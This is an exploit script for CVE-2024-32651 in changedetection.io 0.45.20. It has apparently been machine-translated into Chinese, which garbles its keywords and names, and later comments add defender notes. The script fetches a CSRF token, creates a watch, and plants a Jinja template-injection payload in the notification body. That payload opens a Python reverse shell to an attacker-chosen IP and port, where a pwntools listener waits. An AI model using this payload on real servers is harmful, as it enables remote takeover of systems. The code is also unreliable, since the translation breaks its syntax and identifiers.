
changedetection.io 0.45.20 - 远程代码执行(RCE)

# Exploit Title: changedetection.io 0.45.20 - Remote Code Execution (RCE)
# Date: 5-26-2024
# Exploit Author: Zach Crossman (Zcrosman)
# Vendor Homepage: changedetection.io
# Software Link: https://github.com/dgtlmoon/changedetection.io
# Version: =0.45.20
# Tested on: Linux
# CVE: CVE-2024-32651
从PWN导入*
导入请求
来自BS4进口美丽的小组
导入argparse
def start_listener(端口):
    """Wait for one inbound TCP connection on ``端口`` and hand it to an interactive session.

    Machine-translated rendering of the original PoC: ``听力`` is the translated
    pwntools ``listen`` helper and ``打印`` is ``print``; the text is not runnable as-is.
    """
    # pwntools listener on the requested port (the bind address is not visible
    # in the garbled call, so it cannot be confirmed here).
    侦听器=听力(端口)
    打印(在端口{port} .'上f'LESTINGING in)
    # Blocks until the callback from the planted notification template arrives
    # (presumably — see the socket connect inside add_detection's payload).
    conn=侦听器.wait_for_connection()
    打印(“接收到连接!”)
    # CRLF line endings for the interactive session.
    context.newline=b'\ r \ n'
    # Switch to interactive mode.
    conn.Interactive()
def add_detection(url,listing_ip,listing_port,notification_url=''):
    """Create a watch on the target whose notification body carries a template-injection payload.

    Machine-translated rendering of the original PoC for CVE-2024-32651; keywords,
    identifiers and quoting are garbled and the text is not runnable as-is.

    Args:
        url: base URL of the target changedetection.io instance.
        listing_ip / listing_port: address the payload calls back to (interpolated
            into ``notification_body`` below under garbled names).
        notification_url: optional value for the ``notification_urls`` field; the
            empty default presumably leaves the server's system default in place.

    Defender notes: the injection surface is the ``notification_body`` form field
    saved by the third POST. A stored watch whose notification body contains Jinja
    control tags (``{% for %}`` / ``{% if %}``) together with ``__subclasses__``,
    ``__import__`` or ``popen`` is a strong indicator of this attack; mitigation
    is upgrading to a release that addresses CVE-2024-32651.
    """
    session=requests.session()
    # First request: fetch the page to obtain the CSRF token.
    request1_headers={
        'cache-control':'max-age=0',
        '升级- 不肯定- 重新要求':'1',
        'Accept':'Text/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/webP,Image/apng,/; q=0.8,application/application/application/nigned-exchange; v=b3; q=0.7''',Q=0.7',
        '接受编码:'gzip,deflate',
        'Accept-Language':'En-US,en; q=0.9',
        'Connection':'关闭'
    }
    响应=session.get(url,headers=request1_headers)
    汤=beautifutsoup(响应。文本,'html.parser')
    csrf_token=soup.find('input',{'name':'csrf_token'})['value']
    打印(F'Obted CSRF TOKEN: {CSRF_TOKEN}')
    # Second request: submit the quick-add form and read the redirect URL.
    add_url=f'{url}/form/add/quickwatch'
    add_url_headers={  # define add_url_headers here
        'Origin': URL,
        'content-type':'应用程序/x-www-form-urlenCoded'
    }
    add_url_data={
        'csrf_token': csrf_token,
        'url':'https://reddit.com/r/baseball',
        'tags':'',
        'edit_and_watch_submit_button':'编辑手表',
        'processor':'text_json_diff'
    }
    post_response=session.post(add_url,headers=add_url_headers,data=add_url_data,ally_redirects=false)
    # Extract the new watch's URL from the Location header.
    如果post_response.headers:中的“位置”
        redirect_url=post_response.headers ['location']
        打印(f'redirect url: {redirect_url}')
    其他:
        打印(“找不到重定向URL”)
        返回
    # Third request: save the watch with the SSTI payload in its notification config.
    save_detection_url=f'{url} {redirect_url}'
    save_detection_headers={  # define save_detection_headers
        'Referer': redirect_url,
        'cookie': f'session={session.cookies.get('session')}'
    }
    save_detection_data={
        'csrf_token': csrf_token,
        'url':'https://reddit.com/r/all',
        'title':'',
        'tags':'',
        'time_between_check-weeks':'',
        'time_between_check-days':'',
        'time_between_check-hours':'',
        'time_between_check-minutes':'',
        'time_between_check-seconds':'30',
        'filter_failure_notification_send':'y',
        'fetch_backend':'系统',
        'webdriver_delay':'',
        'webdriver_js_execute_code':'',
        “方法” :'get',
        “标题” :'',
        “ :'',
        'notification_urls': notification_url,
        'notification_title':'',
        # Payload: Jinja-style template stored as the notification body. The garbled
        # names lister_ip / listy_port presumably correspond to listing_ip / listing_port.
        'notification_body': f'''
{{{%for x in().类______________________________________________________________()%}}
{{{%'harning'in x .__ name __%}}}
{{{{{X()._ module .__ hindins __ ['__ import __']('os')。popen('python3 -c'import OS,Pty,socket; s=socket.Socket(); s.Connect(((\\'{lister_ip} \\',{listy_port})); [os.dup2(s.fileno(),f)f in(0,1,1,2)]
{{%endif%}}
{{%endfor%}}
''',
        'notification_format':'系统默认
        'include_filters':'',
        'subtractive_selectors':'',
        'filter_text_added':'y',
        'filter_text_replaced':'y',
        'filter_text_removed':'y',
        'trigger_text':'',
        'ignore_text':'',
        'text_should_not_be_present':'',
        'extract_text':'',
        'save_button':'保存'
    }
    # Persist the watch; the stored template is presumably rendered server-side
    # when a notification fires (not visible here).
    final_response=session.post(save_detection_url,headers=save_detection_headers,data=save_detection_data)
    打印(“最终请求”。)
如果name=='__ -Main __':
    # Entry point (machine-translated ``if __name__ == '__main__':``); the option
    # names are garbled as ' - url' etc., presumably '--url' in the original.
    Parser=argparse.argumentparser(description='添加检测并启动侦听器')
    parser.add_argument(' - url',type=str,必需=true,help='目标站点的基本URL')
    parser.add_argument(' - port',type=int,help='for the Listorer',默认=4444)
    parser.add_argument(' - ip',type=str,必需=true,help=for Listorer'ip地址')
    parser.add_argument(' - Notification',type=str,help='通知URL如果您不想使用系统默认值')
    args=parser.parse_args()
    # Plant the watch first, then listen on the same port the payload was given.
    add_detection(args.url,args.ip,args.port,args.notification)
    start_listener(args.port)
 